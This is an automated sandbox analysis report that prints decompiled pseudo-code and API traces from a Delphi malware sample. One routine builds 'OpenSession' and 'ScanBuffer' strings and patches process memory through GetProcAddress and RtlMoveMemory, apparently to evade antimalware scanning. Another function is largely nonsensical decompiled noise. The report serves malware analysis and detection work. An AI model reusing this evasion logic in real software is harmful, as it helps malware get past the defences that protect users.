                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t32;
                                                                                                					_v16 = 4;
                                                                                                					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                					_pop(_t27);
                                                                                                					 *[fs:eax] = _t27;
                                                                                                					_push(0x2173b78);
                                                                                                					return RegCloseKey(_v8);
                                                                                                				}
                                                                                                			}












                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B22
                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B55
                                                                                                • RegCloseKey.ADVAPI32(?,02173B78,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                • API String ID: 3677997916-4173385793
                                                                                                • Opcode ID: 5dcc88988fcc6af2e2482fad01f690449180c2837cb74a8838888e61fa2a77de
                                                                                                • Instruction ID: 6770cfb824be7bf8e76ae6401d0deeefa171612062da33eba9ef36c63d0ee740
                                                                                                • Opcode Fuzzy Hash: 5dcc88988fcc6af2e2482fad01f690449180c2837cb74a8838888e61fa2a77de
                                                                                                • Instruction Fuzzy Hash: 9101B575980318BAFB21EB908C42FBA73FCDB88B00F6004E2BA14D7580E7745610DB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E0217AC44(void* __esi, void* __eflags) {
                                                                                                				char _v8;
                                                                                                				intOrPtr* _t18;
                                                                                                				intOrPtr _t26;
                                                                                                				void* _t27;
                                                                                                				long _t29;
                                                                                                				intOrPtr _t32;
                                                                                                				void* _t33;
                                                                                                
                                                                                                				_t33 = __eflags;
                                                                                                				_push(0);
                                                                                                				_push(_t32);
                                                                                                				_push(0x217acdb);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t32;
                                                                                                				E0217A9B8(GetThreadLocale(), 0x217acf0, 0x100b,  &_v8);
                                                                                                				_t29 = E02177DC4(0x217acf0, 1, _t33);
                                                                                                				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                					EnumCalendarInfoA(E0217AB90, GetThreadLocale(), _t29, 4);
                                                                                                					_t27 = 7;
                                                                                                					_t18 = 0x21938f0;
                                                                                                					do {
                                                                                                						 *_t18 = 0xffffffff;
                                                                                                						_t18 = _t18 + 4;
                                                                                                						_t27 = _t27 - 1;
                                                                                                					} while (_t27 != 0);
                                                                                                					EnumCalendarInfoA(E0217ABCC, GetThreadLocale(), _t29, 3);
                                                                                                				}
                                                                                                				_pop(_t26);
                                                                                                				 *[fs:eax] = _t26;
                                                                                                				_push(E0217ACE2);
                                                                                                				return E021748A0( &_v8);
                                                                                                			}











                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0217ACDB,?,?,00000000), ref: 0217AC5C
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0217ACDB,?,?,00000000), ref: 0217AC8C
                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000AB90,00000000,00000000,00000004), ref: 0217AC97
                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0217ACDB,?,?,00000000), ref: 0217ACB5
                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABCC,00000000,00000000,00000003), ref: 0217ACC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                • String ID:
                                                                                                • API String ID: 4102113445-0
                                                                                                • Opcode ID: dec886564c7f814c064460140561e435439aa3c14fe7e7e2a15b1881d97e4f30
                                                                                                • Instruction ID: 890ce44ec0c20312221932420f84a50cfab5407fece0997fa6288c128521cb9c
                                                                                                • Opcode Fuzzy Hash: dec886564c7f814c064460140561e435439aa3c14fe7e7e2a15b1881d97e4f30
                                                                                                • Instruction Fuzzy Hash: 2D01D6716C4A887FF711ABB4CD11F6E767EDFC6720FA10570F511A66C0E7649E004AA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 56%
                                                                                                			E02185F6C(signed int __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				char _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				char _v64;
                                                                                                				intOrPtr _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				char _v84;
                                                                                                				intOrPtr _v88;
                                                                                                				char _v92;
                                                                                                				char _v96;
                                                                                                				char _v100;
                                                                                                				intOrPtr _v104;
                                                                                                				char _v108;
                                                                                                				char _v112;
                                                                                                				void* _t69;
                                                                                                				signed int _t100;
                                                                                                				signed int _t101;
                                                                                                				intOrPtr _t104;
                                                                                                				signed int _t109;
                                                                                                				signed int _t110;
                                                                                                				signed int _t111;
                                                                                                				signed int _t116;
                                                                                                				signed int _t120;
                                                                                                				signed int _t157;
                                                                                                				void* _t200;
                                                                                                				signed int _t204;
                                                                                                				void* _t218;
                                                                                                				void* _t223;
                                                                                                				intOrPtr _t224;
                                                                                                				void* _t225;
                                                                                                				intOrPtr _t226;
                                                                                                				signed int _t227;
                                                                                                				void* _t232;
                                                                                                				void* _t237;
                                                                                                				intOrPtr _t238;
                                                                                                				intOrPtr _t239;
                                                                                                				void* _t245;
                                                                                                				void* _t250;
                                                                                                				intOrPtr _t251;
                                                                                                				signed int _t257;
                                                                                                				intOrPtr _t259;
                                                                                                				intOrPtr _t260;
                                                                                                
                                                                                                				_t259 = _t260;
                                                                                                				_t200 = 0xd;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t200 = _t200 - 1;
                                                                                                				} while (_t200 != 0);
                                                                                                				_push(_t200);
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t257 = __eax;
                                                                                                				_push(_t259);
                                                                                                				_push(0x2186329);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t260;
                                                                                                				_t69 = E0217304C(0x270e);
                                                                                                				_push(_t69);
                                                                                                				L021858FC();
                                                                                                				if(_t69 == 0) {
                                                                                                					E021748F4(0x2194598, 0x2186350);
                                                                                                				} else {
                                                                                                					E021748F4(0x2194598, 0x2186340);
                                                                                                				}
                                                                                                				_push(0x218635c);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v12, E02174D64(_v16));
                                                                                                				_push(_v12);
                                                                                                				E02174BB0( &_v24,  *0x2194598, 0x218635c);
                                                                                                				E02174A98( &_v20, E02174D64(_v24));
                                                                                                				_pop(_t218);
                                                                                                				E02183690(_v20, 0x2194580, _t218, _t257);
                                                                                                				_push(0x218635c);
                                                                                                				_push( *0x2194598);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v28, E02174D64(_v32));
                                                                                                				_push(_v28);
                                                                                                				E02174BB0( &_v40,  *0x2194598, 0x218635c);
                                                                                                				E02174A98( &_v36, E02174D64(_v40));
                                                                                                				_pop(_t223);
                                                                                                				E02183690(_v36, 0x2194580, _t223, _t257);
                                                                                                				 *0x219457c = _t257;
                                                                                                				while(1) {
                                                                                                					_t100 =  *0x219457c; // 0x0
                                                                                                					if( *((intOrPtr*)(_t100 + 0xc)) == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t101 =  *0x219457c; // 0x0
                                                                                                					 *0x219458c =  *((intOrPtr*)(_t101 + 0xc)) +  *0x2194538;
                                                                                                					_push(0x2194590);
                                                                                                					_t104 =  *0x2194568; // 0x0
                                                                                                					_v8 = _t104;
                                                                                                					_push(E02175850());
                                                                                                					_t224 =  *0x219458c; // 0x0
                                                                                                					E02174A98( &_v44, _t224);
                                                                                                					_pop(_t225);
                                                                                                					_t109 = E02185958(_v8, 0x2194580, _v44, _t225, 0x2194598, _t257);
                                                                                                					__eflags = _t109;
                                                                                                					if(_t109 == 0) {
                                                                                                						_push(0x218635c);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v48, E02174D64(_v52));
                                                                                                						_push(_v48);
                                                                                                						E02174BB0( &_v60,  *0x2194598, 0x218635c);
                                                                                                						E02174A98( &_v56, E02174D64(_v60));
                                                                                                						_pop(_t245);
                                                                                                						E02183690(_v56, 0x2194580, _t245, _t257);
                                                                                                						_push(0x218635c);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v64, E02174D64(_v68));
                                                                                                						_push(_v64);
                                                                                                						E02174BB0( &_v76,  *0x2194598, 0x218635c);
                                                                                                						E02174A98( &_v72, E02174D64(_v76));
                                                                                                						_pop(_t250);
                                                                                                						E02183690(_v72, 0x2194580, _t250, _t257);
                                                                                                						_t251 =  *0x219458c; // 0x0
                                                                                                						E02174A98( &_v80, _t251);
                                                                                                						E02185BC0( *((intOrPtr*)(_a4 - 4)), 0x2194580, _v80, 0x2194598, _t257, __eflags);
                                                                                                					}
                                                                                                					_t110 =  *0x219457c; // 0x0
                                                                                                					__eflags =  *(_t110 + 4);
                                                                                                					if( *(_t110 + 4) != 0) {
                                                                                                						_t111 =  *0x219457c; // 0x0
                                                                                                						 *0x2194580 =  *_t111 +  *0x2194538;
                                                                                                					} else {
                                                                                                						_t157 =  *0x219457c; // 0x0
                                                                                                						 *0x2194580 =  *((intOrPtr*)(_t157 + 0x10)) +  *0x2194538;
                                                                                                					}
                                                                                                					while(1) {
                                                                                                						_t257 =  *( *0x2194580);
                                                                                                						__eflags = _t257;
                                                                                                						if(_t257 == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t116 = E02185F60(_t257);
                                                                                                						__eflags = _t116;
                                                                                                						if(_t116 == 0) {
                                                                                                							_t120 =  *( *0x2194580) +  *0x2194538 + 2;
                                                                                                							__eflags = _t120;
                                                                                                							 *0x2194584 = _t120;
                                                                                                							_t204 =  *0x2194584; // 0x0
                                                                                                							_t226 =  *0x219458c; // 0x0
                                                                                                							 *0x2194588 = E02185CD8( *((intOrPtr*)(_a4 - 4)), _t204, _t226, _t120);
                                                                                                						} else {
                                                                                                							_push(0x218635c);
                                                                                                							_push( *0x2194598);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v84, E02174D64(_v88));
                                                                                                							_push(_v84);
                                                                                                							E02174BB0( &_v96,  *0x2194598, 0x218635c);
                                                                                                							E02174A98( &_v92, E02174D64(_v96));
                                                                                                							_pop(_t232);
                                                                                                							E02183690(_v92, 0x2194580, _t232, _t257);
                                                                                                							_push(0x218635c);
                                                                                                							_push( *0x2194598);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v100, E02174D64(_v104));
                                                                                                							_push(_v100);
                                                                                                							E02174BB0( &_v112,  *0x2194598, 0x218635c);
                                                                                                							E02174A98( &_v108, E02174D64(_v112));
                                                                                                							_pop(_t237);
                                                                                                							E02183690(_v108, 0x2194580, _t237, _t257);
                                                                                                							_t238 =  *0x219458c; // 0x0
                                                                                                							 *0x2194588 = E02185CD8( *((intOrPtr*)(_a4 - 4)),  *( *0x2194580) & 0x0000ffff, _t238, __eflags);
                                                                                                						}
                                                                                                						_t227 =  *0x2194588; // 0x0
                                                                                                						 *( *0x2194580) = _t227;
                                                                                                						 *0x2194580 =  &(( *0x2194580)[1]);
                                                                                                						__eflags =  *0x2194580;
                                                                                                					}
                                                                                                					 *0x219457c =  *0x219457c + 0x14;
                                                                                                					__eflags =  *0x219457c;
                                                                                                				}
                                                                                                				_pop(_t239);
                                                                                                				 *[fs:eax] = _t239;
                                                                                                				_push(E02186330);
                                                                                                				return E021748C4( &_v112, 0x1a);
                                                                                                			}

                                                                                                0x021862e9
                                                                                                0x021862e9
                                                                                                0x021862f8
                                                                                                0x021862f8
                                                                                                0x021862f8
                                                                                                0x02186310
                                                                                                0x02186313
                                                                                                0x02186316
                                                                                                0x02186328

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02186329,?,?,?,?,0000000C,00000000,00000000), ref: 02185FA4
                                                                                                  • Part of subcall function 02185958: lstrcmpiA.KERNEL32(00000000,00000000,00000000,02185A18), ref: 021859D5
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 02185BC0: GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02185C73), ref: 02185BED
                                                                                                  • Part of subcall function 02185BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185BF3
                                                                                                  • Part of subcall function 02185BC0: GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C07
                                                                                                  • Part of subcall function 02185BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185C0D
                                                                                                  • Part of subcall function 02185BC0: CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressModuleProc$LibraryMemory$CloseCurrentFlushFreeInetLoadMoveOfflineProcessVirtuallstrcmpi
                                                                                                • String ID: OpenSession$ScanBuffer$teSe
                                                                                                • API String ID: 2575397957-3424172483
                                                                                                • Opcode ID: 8998510870580c10ed5f04136f671a216c911225c196bb11df1d45379b554bd4
                                                                                                • Instruction ID: c5eaa153c38b2d77ef385c0f01c2966f53f23016ab33f22c4e262047df53c4c6
                                                                                                • Opcode Fuzzy Hash: 8998510870580c10ed5f04136f671a216c911225c196bb11df1d45379b554bd4
                                                                                                • Instruction Fuzzy Hash: B6B10F35AC0248DFDB11FB94D4D0A9EB7FAEF88700B518466E815AB314DB30AD52CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E0218EE56(intOrPtr* __eax, signed int __ebx, signed int* __ecx, char __edx, signed int __esi) {
                                                                                                				intOrPtr* _t35;
                                                                                                				intOrPtr* _t36;
                                                                                                				intOrPtr* _t37;
                                                                                                				intOrPtr* _t39;
                                                                                                				intOrPtr* _t42;
                                                                                                				intOrPtr* _t43;
                                                                                                				intOrPtr* _t44;
                                                                                                				intOrPtr* _t45;
                                                                                                				intOrPtr* _t46;
                                                                                                				void* _t49;
                                                                                                				long _t56;
                                                                                                				signed int _t65;
                                                                                                				void* _t66;
                                                                                                
                                                                                                				asm("sbb [eax], al");
                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                				asm("pushad");
                                                                                                				asm("out dx, al");
                                                                                                				asm("sbb [edx], al");
                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                				asm("sbb [edx], al");
                                                                                                				asm("cld");
                                                                                                				_pop(ss);
                                                                                                				_t35 = __eax + __edx +  *((intOrPtr*)(__eax + __edx));
                                                                                                				 *_t35 =  *_t35 + _t35;
                                                                                                				 *_t35 =  *_t35 + _t35;
                                                                                                				 *_t35 =  *_t35 + _t35;
                                                                                                				 *((intOrPtr*)(_t35 + 0x480218f0)) =  *((intOrPtr*)(_t35 + 0x480218f0)) + __ebx;
                                                                                                				_t36 = _t35 +  *_t35;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *_t36 =  *_t36 + _t36;
                                                                                                				 *((intOrPtr*)(_t36 + __esi * 8 - 0x31e3fde8)) =  *((intOrPtr*)(_t36 + __esi * 8 - 0x31e3fde8)) + __ecx;
                                                                                                				ss = 0x17;
                                                                                                				_t37 = _t36 +  *_t36;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *_t37 =  *_t37 + _t37;
                                                                                                				 *((intOrPtr*)(__ecx + __esi * 8)) =  *((intOrPtr*)(__ecx + __esi * 8)) + __edx;
                                                                                                				asm("sbb [edx], al");
                                                                                                				_pop(ss);
                                                                                                				_t39 = _t37 +  *((intOrPtr*)(__ecx + 0x18 + __esi * 8)) +  *((intOrPtr*)(_t37 +  *((intOrPtr*)(__ecx + 0x18 + __esi * 8)) + 0x217fe));
                                                                                                				 *_t39 =  *_t39 + _t39;
                                                                                                				 *_t39 =  *_t39 + _t39;
                                                                                                				 *_t39 =  *_t39 + _t39;
                                                                                                				asm("int1");
                                                                                                				asm("sbb [edx], al");
                                                                                                				asm("movsb");
                                                                                                				_t42 =  *ss() +  *_t41;
                                                                                                				 *_t42 =  *_t42 + _t42;
                                                                                                				 *_t42 =  *_t42 + _t42;
                                                                                                				 *_t42 =  *_t42 + _t42;
                                                                                                				_t43 = _t42 + __ebx;
                                                                                                				asm("int1");
                                                                                                				asm("sbb [edx], al");
                                                                                                				asm("sbb [edx], al");
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				 *_t43 =  *_t43 + _t43;
                                                                                                				asm("invalid");
                                                                                                				asm("sbb [edx], al");
                                                                                                				asm("lodsb");
                                                                                                				asm("sbb [edx], al");
                                                                                                				_t44 = _t66 + 1;
                                                                                                				asm("repne sbb [edx], al");
                                                                                                				 *((char*)(_t44 + __ebx + 2)) = __edx;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				 *_t44 =  *_t44 + _t44;
                                                                                                				asm("pushfd");
                                                                                                				asm("repne sbb [edx], al");
                                                                                                				asm("cld");
                                                                                                				_t45 = _t44 +  *_t44;
                                                                                                				 *_t45 =  *_t45 + _t45;
                                                                                                				 *((intOrPtr*)(_t43 + 0x18 + _t65 * 8)) =  *((intOrPtr*)(_t43 + 0x18 + _t65 * 8)) + _t45;
                                                                                                				_t46 = _t45 +  *((intOrPtr*)(__edx));
                                                                                                				 *_t46 =  *_t46 + _t46;
                                                                                                				asm("sbb [edx], al");
                                                                                                				asm("enter 0x190a, 0x2");
                                                                                                				asm("rcl byte [eax+0x218], 0x0");
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *__ecx = __ecx +  *__ecx;
                                                                                                				 *((intOrPtr*)((__ebx |  *__ecx) + 0x1915b02d)) =  *((intOrPtr*)((__ebx |  *__ecx) + 0x1915b02d)) + __ecx;
                                                                                                				_t49 = __ecx +  *((intOrPtr*)(_t46 + __ecx));
                                                                                                				if(_t49 < 0) {
                                                                                                					E02172A1C();
                                                                                                					 *0x219000c = 2;
                                                                                                					 *0x2191014 = 0x2171188;
                                                                                                					 *0x2191018 = 0x2171198;
                                                                                                					 *0x2191046 = 2;
                                                                                                					 *0x2191000 = E0217581C;
                                                                                                					if(E02173AD0() != 0) {
                                                                                                						_t51 = E02173B00();
                                                                                                					}
                                                                                                					E02173BC4(_t51);
                                                                                                					 *0x219104c = 0xd7b0;
                                                                                                					 *0x2191218 = 0xd7b0;
                                                                                                					 *0x21913e4 = 0xd7b0;
                                                                                                					 *0x219103c = GetCommandLineA();
                                                                                                					 *0x2191038 = E021712C0();
                                                                                                					 *0x21915b4 = GetACP();
                                                                                                					_t56 = GetCurrentThreadId();
                                                                                                					 *0x2191030 = _t56;
                                                                                                					return _t56;
                                                                                                				}
                                                                                                				return _t49;
                                                                                                			}

















                                                                                                APIs
                                                                                                  • Part of subcall function 02173AD0: GetKeyboardType.USER32 ref: 02173AD5
                                                                                                  • Part of subcall function 02173AD0: GetKeyboardType.USER32 ref: 02173AE1
                                                                                                • GetCommandLineA.KERNEL32 ref: 0218F06C
                                                                                                • GetACP.KERNEL32 ref: 0218F080
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0218F08A
                                                                                                  • Part of subcall function 02173B00: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B22
